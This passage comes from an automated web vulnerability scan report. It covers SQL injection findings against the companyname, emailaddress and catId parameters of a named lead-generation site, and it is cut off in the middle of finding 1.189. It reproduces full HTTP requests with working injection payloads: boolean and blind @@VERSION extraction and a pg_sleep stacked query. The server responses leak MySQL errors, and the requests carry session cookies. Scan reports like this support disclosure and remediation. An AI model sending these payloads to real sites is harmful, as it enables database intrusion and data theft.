GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20%00'&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:08:34 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=32153bo0htmv3tkr0r773ln656; path=/
Content-Length: 6950
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
ibuteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=1928__Take sales orders&attributeId_394=1939__Not sure&attributeId_395=1947__' at line 5

Request 2

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20%00''&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:08:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=554co4n7kpidq7d73gga9c5r32; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>

1.186. http://www.insideup.com/ppc/leadflow/cace00/project.php [companyname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The companyname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the companyname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:09:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=0kmtq3m9ggi0h26ft8n3577i44; path=/
Content-Length: 6942
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
buteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code' at line 5

Request 2

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name''&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:09:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=69giqsd4ivshsjvi8uq4kobuo7; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>

1.187. http://www.insideup.com/ppc/leadflow/cace00/project.php [companyname parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The companyname parameter appears to be vulnerable to SQL injection attacks. The payloads 98700742'%20or%201%3d1--%20 and 98700742'%20or%201%3d2--%20 were each submitted in the companyname parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name98700742'%20or%201%3d1--%20&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:44:12 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr
...[SNIP]...

Request 2

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name98700742'%20or%201%3d2--%20&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:44:13 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52917


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Inbound Call Center Service, Use InsideUp to Get Quotes and Compare Call Center Vendors. </title>
   <meta name="description" content="Let inbound call centers providers compete for your telemarketing needs. Compare call center services from leading inbound call center vendors."/>
   <meta name="keywords" content=" nbound call center solution, call center inbound service, inbound call center solutions, call center inbound, inbound call center, inbound call centers "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 10    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9, #step_10, #step_11,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Blo
...[SNIP]...

1.188. http://www.insideup.com/ppc/leadflow/cace00/project.php [emailaddress parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The emailaddress parameter appears to be vulnerable to SQL injection attacks. The payloads 27651910'%20or%201%3d1--%20 and 27651910'%20or%201%3d2--%20 were each submitted in the emailaddress parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email27651910'%20or%201%3d1--%20&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:44:25 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr
...[SNIP]...

Request 2

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email27651910'%20or%201%3d2--%20&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:44:26 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52917


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Inbound Call Center Service, Use InsideUp to Get Quotes and Compare Call Center Vendors. </title>
   <meta name="description" content="Let inbound call centers providers compete for your telemarketing needs. Compare call center services from leading inbound call center vendors."/>
   <meta name="keywords" content=" nbound call center solution, call center inbound service, inbound call center solutions, call center inbound, inbound call center, inbound call centers "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 10    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9, #step_10, #step_11,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Blo
...[SNIP]...

1.189. http://www.insideup.com/ppc/leadflow/cace00/project.php [emailaddress parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

